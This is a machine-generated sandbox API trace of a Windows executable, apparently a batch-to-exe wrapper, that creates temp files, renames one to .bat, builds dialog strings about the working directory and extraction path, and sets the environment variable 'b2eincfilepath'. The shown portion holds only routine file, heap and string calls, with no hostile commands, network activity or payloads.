lpTempFileName=0x8907c8 | out: lpTempFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp\\4ad7.tmp")) returned 0x4ad7 [0120.496] PathAddBackslashW (in: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp" | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\") returned="" [0120.496] GetLastError () returned 0x0 [0120.496] SetLastError (dwErrCode=0x0) [0120.496] GetLastError () returned 0x0 [0120.496] SetLastError (dwErrCode=0x0) [0120.496] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x84) returned 0x23e8228 [0120.496] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp\\4ad7.tmp")) returned 1 [0120.496] PathRenameExtensionW (in: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.tmp", pszExt=".bat" | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat") returned 1 [0120.497] GetTempFileNameW (in: lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\", lpPrefixString="", uUnique=0x0, lpTempFileName=0x8907c8 | out: lpTempFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD8.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp\\4ad8.tmp")) returned 0x4ad8 [0120.497] GetLastError () returned 0x0 [0120.498] SetLastError (dwErrCode=0x0) [0120.498] GetLastError () returned 0x0 [0120.498] SetLastError (dwErrCode=0x0) [0120.498] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x84) returned 0x23e82b8 [0120.498] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8907c8 | out: hHeap=0x890000) returned 1 [0120.498] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e80e8 | out: hHeap=0x23e0000) returned 1 [0120.498] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e76c0 | out: hHeap=0x23e0000) returned 1 [0120.498] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e7ed0 | out: hHeap=0x23e0000) returned 1 [0120.498] GetLastError () returned 0x0 [0120.498] SetLastError (dwErrCode=0x0) [0120.498] GetLastError () returned 0x0 [0120.498] SetLastError (dwErrCode=0x0) [0120.498] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e7738 [0120.498] GetLastError () returned 0x0 [0120.498] SetLastError (dwErrCode=0x0) [0120.498] wcslen (_String="S") returned 0x1 [0120.498] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e76a8 [0120.498] GetLastError () returned 0x0 [0120.498] SetLastError (dwErrCode=0x0) [0120.499] GetLastError () returned 0x0 [0120.499] SetLastError (dwErrCode=0x0) [0120.499] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7738, Size=0xc) returned 0x23e7840 [0120.499] GetLastError () returned 0x0 [0120.499] SetLastError (dwErrCode=0x0) [0120.499] wcslen (_String="S") returned 0x1 [0120.499] wcslen (_String="e") returned 0x1 [0120.499] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e76a8, Size=0xe) returned 0x23e77e0 [0120.499] GetLastError () returned 0x0 [0120.499] SetLastError (dwErrCode=0x0) [0120.499] GetLastError () returned 0x0 [0120.499] SetLastError (dwErrCode=0x0) [0120.499] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7840, Size=0xc) returned 0x23e77f8 [0120.499] GetLastError () returned 0x0 [0120.499] SetLastError (dwErrCode=0x0) [0120.499] wcslen (_String="Se") returned 0x2 [0120.499] wcslen (_String="l") returned 0x1 [0120.499] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77e0, Size=0x10) returned 0x23e77c8 [0120.499] GetLastError () returned 0x0 [0120.500] SetLastError (dwErrCode=0x0) [0120.500] GetLastError () returned 0x0 [0120.500] SetLastError (dwErrCode=0x0) [0120.500] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77f8, Size=0xc) returned 0x23e7810 [0120.500] GetLastError () returned 0x0 [0120.500] SetLastError (dwErrCode=0x0) [0120.500] wcslen (_String="Sel") returned 0x3 [0120.500] wcslen (_String="e") returned 0x1 [0120.500] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77c8, Size=0x12) returned 0x23e7d50 [0120.500] GetLastError () returned 0x0 [0120.500] SetLastError (dwErrCode=0x0) [0120.500] GetLastError () returned 0x0 [0120.500] SetLastError (dwErrCode=0x0) [0120.500] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7810, Size=0xc) returned 0x23e7750 [0120.500] GetLastError () returned 0x0 [0120.500] SetLastError (dwErrCode=0x0) [0120.500] wcslen (_String="Sele") returned 0x4 [0120.500] wcslen (_String="c") returned 0x1 [0120.500] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7d50, Size=0x14) returned 0x23e7dd0 [0120.500] GetLastError () returned 0x0 [0120.501] SetLastError (dwErrCode=0x0) [0120.501] GetLastError () returned 0x0 [0120.501] SetLastError (dwErrCode=0x0) [0120.501] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7750, Size=0xc) returned 0x23e76d8 [0120.501] GetLastError () returned 0x0 [0120.501] SetLastError (dwErrCode=0x0) [0120.501] wcslen (_String="Selec") returned 0x5 [0120.501] wcslen (_String="t") returned 0x1 [0120.501] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7dd0, Size=0x16) returned 0x23e7ef0 [0120.501] GetLastError () returned 0x0 [0120.501] SetLastError (dwErrCode=0x0) [0120.501] GetLastError () returned 0x0 [0120.501] SetLastError (dwErrCode=0x0) [0120.501] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e76d8, Size=0xc) returned 0x23e77b0 [0120.501] GetLastError () returned 0x0 [0120.501] SetLastError (dwErrCode=0x0) [0120.501] wcslen (_String="Select") returned 0x6 [0120.501] wcslen (_String=" ") returned 0x1 [0120.501] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7ef0, Size=0x18) returned 0x23e8070 [0120.502] GetLastError () returned 0x0 [0120.502] SetLastError (dwErrCode=0x0) [0120.502] GetLastError () returned 0x0 [0120.502] SetLastError (dwErrCode=0x0) [0120.502] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77b0, Size=0xc) returned 0x23e77c8 [0120.502] GetLastError () returned 0x0 [0120.502] SetLastError (dwErrCode=0x0) [0120.502] wcslen (_String="Select ") returned 0x7 [0120.502] wcslen (_String="t") returned 0x1 [0120.502] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e8070, Size=0x1a) returned 0x23e80e8 [0120.502] GetLastError () returned 0x0 [0120.502] SetLastError (dwErrCode=0x0) [0120.502] GetLastError () returned 0x0 [0120.502] SetLastError (dwErrCode=0x0) [0120.502] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77c8, Size=0xc) returned 0x23e7750 [0120.502] GetLastError () returned 0x0 [0120.502] SetLastError (dwErrCode=0x0) [0120.502] wcslen (_String="Select t") returned 0x8 [0120.502] wcslen (_String="h") returned 0x1 [0120.502] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x1c) returned 0x23e80e8 [0120.503] GetLastError () returned 0x0 [0120.503] SetLastError (dwErrCode=0x0) [0120.503] GetLastError () returned 0x0 [0120.503] SetLastError (dwErrCode=0x0) [0120.503] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7750, Size=0xc) returned 0x23e77e0 [0120.503] GetLastError () returned 0x0 [0120.503] SetLastError (dwErrCode=0x0) [0120.503] wcslen (_String="Select th") returned 0x9 [0120.503] wcslen (_String="e") returned 0x1 [0120.503] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x1e) returned 0x23e80e8 [0120.503] GetLastError () returned 0x0 [0120.503] SetLastError (dwErrCode=0x0) [0120.503] GetLastError () returned 0x0 [0120.503] SetLastError (dwErrCode=0x0) [0120.503] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77e0, Size=0xc) returned 0x23e7768 [0120.503] GetLastError () returned 0x0 [0120.503] SetLastError (dwErrCode=0x0) [0120.503] wcslen (_String="Select the") returned 0xa [0120.503] wcslen (_String=" ") returned 0x1 [0120.504] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x20) returned 0x23e80e8 [0120.504] GetLastError () returned 0x0 [0120.504] SetLastError (dwErrCode=0x0) [0120.504] GetLastError () returned 0x0 [0120.504] SetLastError (dwErrCode=0x0) [0120.504] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7768, Size=0xc) returned 0x23e7858 [0120.504] GetLastError () returned 0x0 [0120.504] SetLastError (dwErrCode=0x0) [0120.504] wcslen (_String="Select the ") returned 0xb [0120.504] wcslen (_String="w") returned 0x1 [0120.504] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x22) returned 0x23e80e8 [0120.504] GetLastError () returned 0x0 [0120.504] SetLastError (dwErrCode=0x0) [0120.504] GetLastError () returned 0x0 [0120.504] SetLastError (dwErrCode=0x0) [0120.504] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7858, Size=0xc) returned 0x23e7798 [0120.504] GetLastError () returned 0x0 [0120.504] SetLastError (dwErrCode=0x0) [0120.504] wcslen (_String="Select the w") returned 0xc [0120.504] wcslen (_String="o") returned 0x1 [0120.505] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x24) returned 0x23e80e8 [0120.505] GetLastError () returned 0x0 [0120.505] SetLastError (dwErrCode=0x0) [0120.505] GetLastError () returned 0x0 [0120.505] SetLastError (dwErrCode=0x0) [0120.505] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7798, Size=0xc) returned 0x23e76c0 [0120.505] GetLastError () returned 0x0 [0120.505] SetLastError (dwErrCode=0x0) [0120.505] wcslen (_String="Select the wo") returned 0xd [0120.505] wcslen (_String="r") returned 0x1 [0120.505] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x26) returned 0x23e80e8 [0120.505] GetLastError () returned 0x0 [0120.505] SetLastError (dwErrCode=0x0) [0120.505] GetLastError () returned 0x0 [0120.505] SetLastError (dwErrCode=0x0) [0120.505] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e76c0, Size=0xc) returned 0x23e77c8 [0120.505] GetLastError () returned 0x0 [0120.505] SetLastError (dwErrCode=0x0) [0120.505] wcslen (_String="Select the wor") returned 0xe [0120.505] wcslen (_String="k") returned 0x1 [0120.506] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x28) returned 0x23e80e8 [0120.506] GetLastError () returned 0x0 [0120.506] SetLastError (dwErrCode=0x0) [0120.506] GetLastError () returned 0x0 [0120.506] SetLastError (dwErrCode=0x0) [0120.506] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77c8, Size=0xc) returned 0x23e7840 [0120.506] GetLastError () returned 0x0 [0120.506] SetLastError (dwErrCode=0x0) [0120.506] wcslen (_String="Select the work") returned 0xf [0120.506] wcslen (_String="i") returned 0x1 [0120.506] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x2a) returned 0x23e80e8 [0120.506] GetLastError () returned 0x0 [0120.506] SetLastError (dwErrCode=0x0) [0120.665] GetLastError () returned 0x0 [0120.665] SetLastError (dwErrCode=0x0) [0120.665] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7840, Size=0xc) returned 0x23e76a8 [0120.665] GetLastError () returned 0x0 [0120.665] SetLastError (dwErrCode=0x0) [0120.665] wcslen (_String="Select the worki") returned 0x10 [0120.665] wcslen (_String="n") returned 0x1 [0120.666] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x2c) returned 0x23e80e8 [0120.666] GetLastError () returned 0x0 [0120.666] SetLastError (dwErrCode=0x0) [0120.666] GetLastError () returned 0x0 [0120.666] SetLastError (dwErrCode=0x0) [0120.666] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e76a8, Size=0xc) returned 0x23e77f8 [0120.666] GetLastError () returned 0x0 [0120.666] SetLastError (dwErrCode=0x0) [0120.666] wcslen (_String="Select the workin") returned 0x11 [0120.666] wcslen (_String="g") returned 0x1 [0120.666] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x2e) returned 0x23e80e8 [0120.666] GetLastError () returned 0x0 [0120.666] SetLastError (dwErrCode=0x0) [0120.666] GetLastError () returned 0x0 [0120.666] SetLastError (dwErrCode=0x0) [0120.666] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77f8, Size=0xc) returned 0x23e7750 [0120.666] GetLastError () returned 0x0 [0120.666] SetLastError (dwErrCode=0x0) [0120.666] wcslen (_String="Select the working") returned 0x12 [0120.666] wcslen (_String=" ") returned 0x1 [0120.666] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x30) returned 0x23e80e8 [0120.666] GetLastError () returned 0x0 [0120.666] SetLastError (dwErrCode=0x0) [0120.666] GetLastError () returned 0x0 [0120.666] SetLastError (dwErrCode=0x0) [0120.667] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7750, Size=0xc) returned 0x23e77e0 [0120.667] GetLastError () returned 0x0 [0120.667] SetLastError (dwErrCode=0x0) [0120.667] wcslen (_String="Select the working ") returned 0x13 [0120.667] wcslen (_String="d") returned 0x1 [0120.667] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x32) returned 0x23e80e8 [0120.667] GetLastError () returned 0x0 [0120.667] SetLastError (dwErrCode=0x0) [0120.667] GetLastError () returned 0x0 [0120.667] SetLastError (dwErrCode=0x0) [0120.667] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77e0, Size=0xc) returned 0x23e7720 [0120.667] GetLastError () returned 0x0 [0120.667] SetLastError (dwErrCode=0x0) [0120.667] wcslen (_String="Select the working d") returned 0x14 [0120.667] wcslen (_String="i") returned 0x1 [0120.667] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x34) returned 0x23e80e8 [0120.667] GetLastError () returned 0x0 [0120.667] SetLastError (dwErrCode=0x0) [0120.667] GetLastError () returned 0x0 [0120.667] SetLastError (dwErrCode=0x0) [0120.667] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7720, Size=0xc) returned 0x23e7768 [0120.667] GetLastError () returned 0x0 [0120.667] SetLastError (dwErrCode=0x0) [0120.667] wcslen (_String="Select the working di") returned 0x15 [0120.668] wcslen (_String="r") returned 0x1 [0120.668] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x36) returned 0x23e80e8 [0120.668] GetLastError () returned 0x0 [0120.668] SetLastError (dwErrCode=0x0) [0120.668] GetLastError () returned 0x0 [0120.668] SetLastError (dwErrCode=0x0) [0120.668] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7768, Size=0xc) returned 0x23e7780 [0120.668] GetLastError () returned 0x0 [0120.668] SetLastError (dwErrCode=0x0) [0120.668] wcslen (_String="Select the working dir") returned 0x16 [0120.668] wcslen (_String="e") returned 0x1 [0120.668] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x38) returned 0x23e80e8 [0120.668] GetLastError () returned 0x0 [0120.668] SetLastError (dwErrCode=0x0) [0120.668] GetLastError () returned 0x0 [0120.668] SetLastError (dwErrCode=0x0) [0120.668] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7780, Size=0xc) returned 0x23e77b0 [0120.668] GetLastError () returned 0x0 [0120.668] SetLastError (dwErrCode=0x0) [0120.668] wcslen (_String="Select the working dire") returned 0x17 [0120.668] wcslen (_String="c") returned 0x1 [0120.669] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x3a) returned 0x23e80e8 [0120.669] GetLastError () returned 0x0 [0120.669] SetLastError (dwErrCode=0x0) [0120.669] GetLastError () returned 0x0 [0120.669] SetLastError (dwErrCode=0x0) [0120.669] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77b0, Size=0xc) returned 0x23e76f0 [0120.669] GetLastError () returned 0x0 [0120.669] SetLastError (dwErrCode=0x0) [0120.669] wcslen (_String="Select the working direc") returned 0x18 [0120.669] wcslen (_String="t") returned 0x1 [0120.669] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x3c) returned 0x23e80e8 [0120.669] GetLastError () returned 0x0 [0120.669] SetLastError (dwErrCode=0x0) [0120.669] GetLastError () returned 0x0 [0120.669] SetLastError (dwErrCode=0x0) [0120.669] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e76f0, Size=0xc) returned 0x23e7708 [0120.669] GetLastError () returned 0x0 [0120.669] SetLastError (dwErrCode=0x0) [0120.669] wcslen (_String="Select the working direct") returned 0x19 [0120.669] wcslen (_String="o") returned 0x1 [0120.670] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x3e) returned 0x23e80e8 [0120.670] GetLastError () returned 0x0 [0120.670] SetLastError (dwErrCode=0x0) [0120.670] GetLastError () returned 0x0 [0120.670] SetLastError (dwErrCode=0x0) [0120.670] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7708, Size=0xc) returned 0x23e77c8 [0120.670] GetLastError () returned 0x0 [0120.670] SetLastError (dwErrCode=0x0) [0120.670] wcslen (_String="Select the working directo") returned 0x1a [0120.670] wcslen (_String="r") returned 0x1 [0120.670] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x40) returned 0x23e80e8 [0120.670] GetLastError () returned 0x0 [0120.670] SetLastError (dwErrCode=0x0) [0120.670] GetLastError () returned 0x0 [0120.670] SetLastError (dwErrCode=0x0) [0120.670] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77c8, Size=0xc) returned 0x23e7828 [0120.670] GetLastError () returned 0x0 [0120.670] SetLastError (dwErrCode=0x0) [0120.670] wcslen (_String="Select the working director") returned 0x1b [0120.671] wcslen (_String="y") returned 0x1 [0120.671] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e80e8, Size=0x42) returned 0x23e80e8 [0120.671] GetLastError () returned 0x0 [0120.671] SetLastError (dwErrCode=0x0) [0120.671] GetLastError () returned 0x0 [0120.671] SetLastError (dwErrCode=0x0) [0120.671] wcslen (_String="Select the working directory") returned 0x1c [0120.671] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x42) returned 0x23e8348 [0120.671] GetLastError () returned 0x0 [0120.671] SetLastError (dwErrCode=0x0) [0120.671] GetLastError () returned 0x0 [0120.671] SetLastError (dwErrCode=0x0) [0120.671] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x23e0608 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0120.671] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x3a) returned 0x23e8398 [0120.671] GetLastError () returned 0x0 [0120.671] SetLastError (dwErrCode=0x0) [0120.671] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\") returned 0x18 [0120.671] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e8398 | out: hHeap=0x23e0000) returned 1 [0120.671] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e8348 | out: hHeap=0x23e0000) returned 1 [0120.671] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x3a) returned 0x23e8760 [0120.671] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0120.673] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e80e8 | out: hHeap=0x23e0000) returned 1 [0120.673] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e7828 | out: hHeap=0x23e0000) returned 1 [0120.673] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e8760 | out: hHeap=0x23e0000) returned 1 [0120.673] GetLastError () returned 0x0 [0120.673] SetLastError (dwErrCode=0x0) [0120.673] GetLastError () returned 0x0 [0120.673] SetLastError (dwErrCode=0x0) [0120.673] wcslen (_String="Select the extraction path") returned 0x1a [0120.673] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x3e) returned 0x23e85f8 [0120.673] GetLastError () returned 0x0 [0120.673] SetLastError (dwErrCode=0x0) [0120.673] GetLastError () returned 0x0 [0120.673] SetLastError (dwErrCode=0x0) [0120.673] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x23e0608 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0120.673] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x3a) returned 0x23e8370 [0120.673] GetLastError () returned 0x0 [0120.673] SetLastError (dwErrCode=0x0) [0120.673] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\") returned 0x18 [0120.673] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e8370 | out: hHeap=0x23e0000) returned 1 [0120.673] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e85f8 | out: hHeap=0x23e0000) returned 1 [0120.673] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x3a) returned 0x23e8838 [0120.673] PathRemoveBackslashW (in: pszPath="C:\\Users\\FD1HVy\\Desktop\\" | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned="" [0120.674] GetLastError () returned 0x0 [0120.674] SetLastError (dwErrCode=0x0) [0120.674] GetLastError () returned 0x0 [0120.674] SetLastError (dwErrCode=0x0) [0120.674] GetLastError () returned 0x0 [0120.674] SetLastError (dwErrCode=0x0) [0120.674] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0120.674] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x38) returned 0x23e80e8 [0120.674] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x2710) returned 0x8907c8 [0120.674] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\Desktop", lpszShortPath=0x8907c8, cchBuffer=0x2710 | out: lpszShortPath="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0120.675] GetLastError () returned 0x0 [0120.675] SetLastError (dwErrCode=0x0) [0120.675] GetLastError () returned 0x0 [0120.675] SetLastError (dwErrCode=0x0) [0120.675] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x38) returned 0x23e8d38 [0120.675] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8907c8 | out: hHeap=0x890000) returned 1 [0120.675] GetLastError () returned 0x0 [0120.675] SetLastError (dwErrCode=0x0) [0120.675] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0120.675] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e80e8 | out: hHeap=0x23e0000) returned 1 [0120.675] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e8d38 | out: hHeap=0x23e0000) returned 1 [0120.675] SetEnvironmentVariableW (lpName="b2eincfilepath", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0120.675] GetLastError () returned 0x0 [0120.675] SetLastError (dwErrCode=0x0) [0120.675] GetLastError () returned 0x0 [0120.675] SetLastError (dwErrCode=0x0) [0120.675] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\") returned 0x35 [0120.675] wcslen (_String="extd.exe") returned 0x8 [0120.675] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e0528, Size=0x84) returned 0x23e9358 [0120.675] GetLastError () returned 0x0 [0120.676] SetLastError (dwErrCode=0x0) [0120.676] GetLastError () returned 0x0 [0120.676] SetLastError (dwErrCode=0x0) [0120.676] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e7780 [0120.676] GetLastError () returned 0x0 [0120.676] SetLastError (dwErrCode=0x0) [0120.676] wcslen (_String="@") returned 0x1 [0120.676] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e7840 [0120.676] GetLastError () returned 0x0 [0120.676] SetLastError (dwErrCode=0x0) [0120.676] GetLastError () returned 0x0 [0120.676] SetLastError (dwErrCode=0x0) [0120.676] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7780, Size=0xc) returned 0x23e77e0 [0120.676] GetLastError () returned 0x0 [0120.676] SetLastError (dwErrCode=0x0) [0120.676] wcslen (_String="@") returned 0x1 [0120.676] wcslen (_String="s") returned 0x1 [0120.676] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7840, Size=0xe) returned 0x23e7870 [0120.676] GetLastError () returned 0x0 [0120.676] SetLastError (dwErrCode=0x0) [0120.676] GetLastError () returned 0x0 [0120.677] SetLastError (dwErrCode=0x0) [0120.677] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77e0, Size=0xc) returned 0x23e7810 [0120.677] GetLastError () returned 0x0 [0120.677] SetLastError (dwErrCode=0x0) [0120.677] wcslen (_String="@s") returned 0x2 [0120.677] wcslen (_String="h") returned 0x1 [0120.677] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7870, Size=0x10) returned 0x23e7798 [0120.677] GetLastError () returned 0x0 [0120.677] SetLastError (dwErrCode=0x0) [0120.677] GetLastError () returned 0x0 [0120.677] SetLastError (dwErrCode=0x0) [0120.677] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7810, Size=0xc) returned 0x23e7858 [0120.677] GetLastError () returned 0x0 [0120.677] SetLastError (dwErrCode=0x0) [0120.677] wcslen (_String="@sh") returned 0x3 [0120.677] wcslen (_String="i") returned 0x1 [0120.678] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7798, Size=0x12) returned 0x23e8010 [0120.678] GetLastError () returned 0x0 [0120.678] SetLastError (dwErrCode=0x0) [0120.678] GetLastError () returned 0x0 [0120.678] SetLastError (dwErrCode=0x0) [0120.678] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7858, Size=0xc) returned 0x23e77e0 [0120.678] GetLastError () returned 0x0 [0120.678] SetLastError (dwErrCode=0x0) [0120.678] wcslen (_String="@shi") returned 0x4 [0120.678] wcslen (_String="f") returned 0x1 [0120.678] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e8010, Size=0x14) returned 0x23e7e10 [0120.678] GetLastError () returned 0x0 [0120.678] SetLastError (dwErrCode=0x0) [0120.678] GetLastError () returned 0x0 [0120.678] SetLastError (dwErrCode=0x0) [0120.678] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e77e0, Size=0xc) returned 0x23e7768 [0120.678] GetLastError () returned 0x0 [0120.678] SetLastError (dwErrCode=0x0) [0120.678] wcslen (_String="@shif") returned 0x5 [0120.678] wcslen (_String="t") returned 0x1 [0120.678] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7e10, Size=0x16) returned 0x23e7e70 [0120.678] GetLastError () returned 0x0 [0120.678] SetLastError (dwErrCode=0x0) [0120.678] GetLastError () returned 0x0 [0120.679] SetLastError (dwErrCode=0x0) [0120.679] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7768, Size=0xc) returned 0x23e76f0 [0120.679] GetLastError () returned 0x0 [0120.679] SetLastError (dwErrCode=0x0) [0120.679] wcslen (_String="@shift") returned 0x6 [0120.679] wcslen (_String=" ") returned 0x1 [0120.679] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e7e70, Size=0x18) returned 0x23e7e10 